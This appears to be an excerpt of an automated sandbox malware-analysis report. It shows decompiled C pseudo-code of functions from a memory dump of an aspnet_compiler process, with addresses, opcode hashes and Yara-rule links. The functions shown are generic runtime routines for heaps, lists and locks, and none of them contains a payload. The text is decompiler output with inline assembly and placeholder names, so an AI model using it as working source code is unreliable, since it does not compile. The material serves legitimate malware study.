                                                                                        0x011bae93
                                                                                        0x011bae93
                                                                                        0x011bae98
                                                                                        0x011bae9d
                                                                                        0x012026a2
                                                                                        0x012026b4
                                                                                        0x012026a4
                                                                                        0x012026ad
                                                                                        0x012026ad
                                                                                        0x012026b9
                                                                                        0x00000000
                                                                                        0x012026bb
                                                                                        0x00000000
                                                                                        0x012026bb
                                                                                        0x011baea3
                                                                                        0x011baea3
                                                                                        0x011baea3
                                                                                        0x011baeaa
                                                                                        0x012026c0
                                                                                        0x012026c9
                                                                                        0x012026c9
                                                                                        0x011baeb3
                                                                                        0x012026d4
                                                                                        0x012026e1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012026e7
                                                                                        0x012026ee
                                                                                        0x012026f0
                                                                                        0x012026f9
                                                                                        0x012026f9
                                                                                        0x01202702
                                                                                        0x01202708
                                                                                        0x01202708
                                                                                        0x0120270b
                                                                                        0x0120270f
                                                                                        0x01202711
                                                                                        0x01202711
                                                                                        0x01202725
                                                                                        0x01202725
                                                                                        0x00000000
                                                                                        0x011baeb9
                                                                                        0x011baeb9
                                                                                        0x011baebf
                                                                                        0x011baebf
                                                                                        0x011baeb3

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                        • Instruction ID: a3de48f9f4b515fe5cce121098a25d141e97d87496c95ff6cea4fd65d731ef4d
                                                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                        • Instruction Fuzzy Hash: A921D432611682DFE71BDB2DD988B6977E8EF44354F1A01A1DE048B6E3D734DC40C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CFD9B Relevance: .1, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E011CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E011A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                        0x011cfd9b
                                                                                        0x011cfda0
                                                                                        0x011cfda1
                                                                                        0x011cfdab
                                                                                        0x011cfdad
                                                                                        0x011cfdb0
                                                                                        0x011cfdb8
                                                                                        0x011cfe0f
                                                                                        0x011cfde6
                                                                                        0x011cfde9
                                                                                        0x011cfdec
                                                                                        0x0120c0c0
                                                                                        0x011cfdfe
                                                                                        0x011cfe06
                                                                                        0x011cfe06
                                                                                        0x0120c0c8
                                                                                        0x011cfe2d
                                                                                        0x011cfe2d
                                                                                        0x00000000
                                                                                        0x011cfe2d
                                                                                        0x0120c0d1
                                                                                        0x0120c0e0
                                                                                        0x0120c0e5
                                                                                        0x0120c0e5
                                                                                        0x0120c0e8
                                                                                        0x00000000
                                                                                        0x0120c0e8
                                                                                        0x011cfdf4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011cfdf6
                                                                                        0x011cfdfa
                                                                                        0x011cfe1a
                                                                                        0x011cfe1f
                                                                                        0x011cfe1f
                                                                                        0x011cfdfc
                                                                                        0x00000000
                                                                                        0x011cfdfc
                                                                                        0x011cfdcc
                                                                                        0x011cfdd0
                                                                                        0x011cfe26
                                                                                        0x00000000
                                                                                        0x011cfe26
                                                                                        0x011cfdd8
                                                                                        0x011cfddb
                                                                                        0x011cfddd
                                                                                        0x011cfde0
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                        • Instruction ID: 642b0bef55853bc8d2364ef1de0657d53c8a13d350afbf1f88fc5663ed942ab2
                                                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                        • Instruction Fuzzy Hash: 41217C72600A42DFD739CF4DC540AAAB7E6EBA4E10F26856EE94987612D7309C02CF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CB390 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 54%
                                                                                        			E011CB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E011B2280(_t12, 0x1288608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E011D00C2(0x1288608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                        0x011cb395
                                                                                        0x011cb3a2
                                                                                        0x011cb3a5
                                                                                        0x011cb3aa
                                                                                        0x011cb3b2
                                                                                        0x011cb3ba
                                                                                        0x011cb3bd
                                                                                        0x011cb3c0
                                                                                        0x011cb3c4
                                                                                        0x011cb3c9
                                                                                        0x0120a3e9
                                                                                        0x0120a3ed
                                                                                        0x0120a3f0
                                                                                        0x0120a3ff
                                                                                        0x0120a403
                                                                                        0x0120a409
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0120a40b
                                                                                        0x0120a40b
                                                                                        0x0120a40f
                                                                                        0x0120a415
                                                                                        0x0120a423
                                                                                        0x0120a423
                                                                                        0x0120a415
                                                                                        0x011cb3d1
                                                                                        0x011cb3e8
                                                                                        0x011cb3e8
                                                                                        0x011cb3d9

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4025eb0f0f5efd20611f69c36f5374fda4715ae54e4c21a57ef98ebb7ab464cf
                                                                                        • Instruction ID: 0e1894256eb5efc8d7cda30127390da6ba7c4b10d7cca5d8b2f9321d93739fd9
                                                                                        • Opcode Fuzzy Hash: 4025eb0f0f5efd20611f69c36f5374fda4715ae54e4c21a57ef98ebb7ab464cf
                                                                                        • Instruction Fuzzy Hash: 9D116F333292105FCB2DDB198D82A6B7396EBD5770B65122DDD16DB3C0CA315C01C695
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01199240 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E01199240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x126f708);
				E011ED08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E011D95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E011D95D0();
				_t33 =  *0x12884c4; // 0x0
				L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x12884c4; // 0x0
				L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x12884c4; // 0x0
				E011B2280(L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x12886b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E011D95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E011D95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01199325();
					_t50 =  *0x12884c4; // 0x0
					return E011ED0D1(L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                        0x01199240
                                                                                        0x01199242
                                                                                        0x01199247
                                                                                        0x0119924c
                                                                                        0x0119924e
                                                                                        0x01199255
                                                                                        0x01199257
                                                                                        0x0119925a
                                                                                        0x0119925f
                                                                                        0x0119925f
                                                                                        0x01199266
                                                                                        0x01199271
                                                                                        0x01199276
                                                                                        0x01199279
                                                                                        0x0119927e
                                                                                        0x01199295
                                                                                        0x0119929a
                                                                                        0x011992b1
                                                                                        0x011992b6
                                                                                        0x011992d7
                                                                                        0x011992dc
                                                                                        0x011992e0
                                                                                        0x011992e6
                                                                                        0x011992e8
                                                                                        0x011992ee
                                                                                        0x01199332
                                                                                        0x01199333
                                                                                        0x01199337
                                                                                        0x01199338
                                                                                        0x0119933a
                                                                                        0x0119933a
                                                                                        0x0119933d
                                                                                        0x01199342
                                                                                        0x01199342
                                                                                        0x01199345
                                                                                        0x01199349
                                                                                        0x0119934e
                                                                                        0x01199352
                                                                                        0x01199357
                                                                                        0x011992f4
                                                                                        0x011992f4
                                                                                        0x011992f6
                                                                                        0x011992f9
                                                                                        0x01199300
                                                                                        0x01199306
                                                                                        0x01199324
                                                                                        0x01199324

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 1a774e60645c6429deb83280293a8419b24cdf94cc5b35c22716b33014b96221
                                                                                        • Instruction ID: d1fa8d6fe4ae6c4af03696fadb44b8c68739b83ac0e11013bdff444a8627d071
                                                                                        • Opcode Fuzzy Hash: 1a774e60645c6429deb83280293a8419b24cdf94cc5b35c22716b33014b96221
                                                                                        • Instruction Fuzzy Hash: 72215932041A41DFCB2AEF68CA44F59B7F9FF18708F54456CE1098AAA2CB34E941CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01224257 Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E01224257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x12708d0);
				E011ED08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E012241E8(__ebx, __edi, __ecx, _t39);
				E011AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x12887e4;
					_t18 =  *0x12887e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1285cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x12887e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x12887e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01197055(_t31 + 0xfffffff8);
								_t24 =  *0x12887e0; // 0x0
								_t18 = _t24 - 1;
								 *0x12887e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1285cd0;
				if( *0x1285cd0 <= 0) {
					L01197055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x12887e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x12887e8 = _t30;
						 *0x12887e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E011ED0D1(L01224320());
			}















                                                                                        0x01224257
                                                                                        0x01224257
                                                                                        0x01224257
                                                                                        0x01224259
                                                                                        0x0122425e
                                                                                        0x01224263
                                                                                        0x01224265
                                                                                        0x01224273
                                                                                        0x01224278
                                                                                        0x0122427c
                                                                                        0x0122427f
                                                                                        0x01224281
                                                                                        0x01224287
                                                                                        0x012242d7
                                                                                        0x012242d7
                                                                                        0x012242da
                                                                                        0x0122428d
                                                                                        0x0122428d
                                                                                        0x0122428f
                                                                                        0x01224292
                                                                                        0x01224297
                                                                                        0x0122429c
                                                                                        0x012242a0
                                                                                        0x012242a6
                                                                                        0x012242a8
                                                                                        0x012242ae
                                                                                        0x012242b3
                                                                                        0x00000000
                                                                                        0x012242ba
                                                                                        0x012242ba
                                                                                        0x012242bf
                                                                                        0x012242c5
                                                                                        0x012242ca
                                                                                        0x012242cf
                                                                                        0x012242d0
                                                                                        0x00000000
                                                                                        0x012242d0
                                                                                        0x012242b3
                                                                                        0x00000000
                                                                                        0x012242a6
                                                                                        0x0122429c
                                                                                        0x012242dc
                                                                                        0x012242dc
                                                                                        0x012242e3
                                                                                        0x01224309
                                                                                        0x012242e5
                                                                                        0x012242e5
                                                                                        0x012242e8
                                                                                        0x012242ee
                                                                                        0x012242f0
                                                                                        0x00000000
                                                                                        0x012242f2
                                                                                        0x012242f2
                                                                                        0x012242f4
                                                                                        0x012242f7
                                                                                        0x012242f9
                                                                                        0x01224300
                                                                                        0x01224300
                                                                                        0x012242f0
                                                                                        0x0122430e
                                                                                        0x0122431f

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2b198ab9cd3540a9853e5d2a30fbc55a0bc1e5f9ea27dcb3f7961559fca3e019
                                                                                        • Instruction ID: ce558bbb2ee8b10cffbf7925b5d62bfb87a59f96d8270c148ddec0851d8c3225
                                                                                        • Opcode Fuzzy Hash: 2b198ab9cd3540a9853e5d2a30fbc55a0bc1e5f9ea27dcb3f7961559fca3e019
                                                                                        • Instruction Fuzzy Hash: 3B216D75922A52EFCB29FF69E00461CBBF1FB46714BA4826ED2158F299D7319451CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C2397 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 29%
                                                                                        			E011C2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x128848c != 0) {
					L011BFAD0(0x1288610);
					if( *0x128848c == 0) {
						E011BFA00(0x1288610, _t19, _t27, 0x1288610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E011C2581(0x1288610, 0x11750a0, _t26, _t27, _t28);
						E011BFA00(0x1288610, 0x11750a0, _t27, 0x1288610);
					}
				} else {
					L1:
					_t11 =  *0x1288614; // 0x0
					if(_t11 == 0) {
						_t11 = E011D4886(0x1171088, 1, 0x1288614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E011C2581(0x1288610, (_t11 << 4) + 0x1175070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                        0x011c23b0
                                                                                        0x011c23b6
                                                                                        0x011c2409
                                                                                        0x011c2415
                                                                                        0x01205ae9
                                                                                        0x00000000
                                                                                        0x011c241b
                                                                                        0x011c241b
                                                                                        0x011c241d
                                                                                        0x011c2427
                                                                                        0x011c242e
                                                                                        0x011c2430
                                                                                        0x011c2430
                                                                                        0x011c23b8
                                                                                        0x011c23b8
                                                                                        0x011c23b8
                                                                                        0x011c23bf
                                                                                        0x011c23fc
                                                                                        0x011c23fc
                                                                                        0x011c23c1
                                                                                        0x011c23c3
                                                                                        0x011c23d0
                                                                                        0x011c23d8
                                                                                        0x011c23d8
                                                                                        0x011c23dc
                                                                                        0x011c23de
                                                                                        0x011c23e1
                                                                                        0x011c23e1
                                                                                        0x011c23ec

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 90f3ee9c97e77b35ceb8c1f36d6b35089fcd0c3608a0b47396c4839a53223746
                                                                                        • Instruction ID: 181bdec8e6e2333d52601a66a9b1cdf7d3df8a74b49223b5f226236c6b307c03
                                                                                        • Opcode Fuzzy Hash: 90f3ee9c97e77b35ceb8c1f36d6b35089fcd0c3608a0b47396c4839a53223746
                                                                                        • Instruction Fuzzy Hash: 7A118E327443016BE33DA63DAC80B29B6D9FB74B14F44801EF602A7280C7B4D801C754
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012146A7 Relevance: .1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E012146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E011DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E011CD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L011B77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                        0x012146b7
                                                                                        0x012146ba
                                                                                        0x012146c5
                                                                                        0x012146c8
                                                                                        0x012146d0
                                                                                        0x012146d4
                                                                                        0x012146e6
                                                                                        0x012146e9
                                                                                        0x012146f4
                                                                                        0x012146ff
                                                                                        0x01214705
                                                                                        0x01214706
                                                                                        0x0121470c
                                                                                        0x01214713
                                                                                        0x0121471b
                                                                                        0x01214723
                                                                                        0x01214725
                                                                                        0x012146d6
                                                                                        0x012146d9
                                                                                        0x012146db
                                                                                        0x012146db
                                                                                        0x01214732

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                        • Instruction ID: 044517832e46ea3f93c948ffd5ad4d9e55c6b20eeb033d9ee15d60f209669219
                                                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                        • Instruction Fuzzy Hash: 3B11C272904249BFCB05AF5C98808BEB7B9EFA5314F10806AF9448B351DB318D55D7A4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D37F5 Relevance: .1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 87%
                                                                                        			E011D37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E011B2280(_t6, 0x1288550);
				}
				_t29 = E011D387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E011AFFB0(0x1288550, _t27, 0x1288550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                        0x011d37fa
                                                                                        0x011d37fc
                                                                                        0x011d3805
                                                                                        0x011d3808
                                                                                        0x011d3808
                                                                                        0x011d3814
                                                                                        0x011d3818
                                                                                        0x011d3846
                                                                                        0x011d3848
                                                                                        0x011d384b
                                                                                        0x011d384b
                                                                                        0x011d3852
                                                                                        0x00000000
                                                                                        0x011d3854
                                                                                        0x011d3856
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d3863
                                                                                        0x00000000
                                                                                        0x011d3863
                                                                                        0x011d381a
                                                                                        0x011d381a
                                                                                        0x011d381f
                                                                                        0x011d386e
                                                                                        0x011d386e
                                                                                        0x011d3871
                                                                                        0x011d3873
                                                                                        0x011d3873
                                                                                        0x011d3868
                                                                                        0x00000000
                                                                                        0x011d3868
                                                                                        0x011d3821
                                                                                        0x011d3826
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011d3828
                                                                                        0x011d382a
                                                                                        0x011d3841
                                                                                        0x00000000
                                                                                        0x011d3841

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48cd05dd9ae3cbb6cb937c3a0e72c001e18a172fc8bb9f13fd42b4c30b9883c9
                                                                                        • Instruction ID: 240efab7c5bdb278dc07682d1499aa40cd8b917230aa10d0aff15bbc723fd35d
                                                                                        • Opcode Fuzzy Hash: 48cd05dd9ae3cbb6cb937c3a0e72c001e18a172fc8bb9f13fd42b4c30b9883c9
                                                                                        • Instruction Fuzzy Hash: 460126F29126119BC33F8B1D9940E2ABBA6FF81B60716416DE9258B205D730D801C7D2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C002D Relevance: .1, Instructions: 55COMMON
